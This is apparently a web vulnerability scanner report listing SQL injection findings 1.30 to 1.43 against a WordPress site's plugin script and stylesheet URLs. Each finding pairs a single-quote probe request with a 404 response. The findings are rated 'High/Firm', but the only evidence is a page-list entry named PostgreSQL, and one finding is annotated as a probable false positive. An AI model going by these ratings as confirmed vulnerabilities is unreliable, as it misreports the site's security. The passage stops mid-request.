Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.30. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The scanner reports the database as PostgreSQL, but as in 1.29 the ' in the path produced WordPress's 404 page, and the only match is <li class="page page-postgresql ">, a page-list entry for a page named PostgreSQL; no database error message appears. Probable false positive.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins'/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.1.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.31. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins/syntaxhighlighter'/syntaxhighlighter3/scripts/shBrushPhp.js?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.1.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:33 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:33 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.32. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3'/scripts/shBrushPhp.js?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.1.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.33. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts'/shBrushPhp.js?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.1.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.34. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 6, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js'?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.1.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.35. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content'/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.1.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:17 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.36. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins'/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.1.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:19 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:20 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.37. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins/syntaxhighlighter'/syntaxhighlighter3/scripts/shCore.js?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.1.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:22 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.38. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3'/scripts/shCore.js?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.1.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:24 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.39. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts'/shCore.js?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.1.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:27 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.40. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 6, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js'?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.1.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:29 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.41. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content'/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.2.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.42. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins'/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.2.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:33:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.43. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content/plugins/syntaxhighlighter'/syntaxhighlighter3/styles/shCore.css?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
